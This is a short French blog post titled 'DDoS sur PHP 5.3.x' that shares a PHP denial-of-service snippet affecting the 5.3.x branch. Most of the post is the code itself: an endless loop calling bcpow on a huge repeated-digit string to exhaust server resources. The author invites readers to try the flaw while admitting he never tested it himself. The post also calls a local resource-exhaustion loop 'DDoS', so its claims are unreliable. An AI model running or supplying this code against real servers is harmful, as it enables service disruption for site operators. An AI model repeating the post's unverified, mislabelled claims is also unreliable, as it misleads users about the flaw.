DDoS sur PHP 5.3.x

 dans Failles, Sécurité

En parcourant la toile à la recherche une info, je suis tombé sur un exploit assez sympathique.
Ceci concerne PHP mais en version 5.3.x, donc toute cette branche est impactée.

Je n’ai pas eu de temps de vraiment testé l’exploit car je ne possède pas moi même cette version de PHP et j’ai pas réellement le temps d’en faire l’installation…
Si toute fois vous avez cette version et que vous testez, vous me ferez un p’tit retour hein 😛

Quoi qu’il en soit, voici l’exploit en question :

<?php
$junk=str_repeat(« 99999999999999999999999999999999999999999999999999 »,99999);
for($i=0;$i<2;){
$buff=bcpow($junk, ‘3’, 2);
$buff=null;
}
?>

Vous croyez que c’était pire ? Ben non, maintenant à vous de tester la faille 😉

Articles recommandés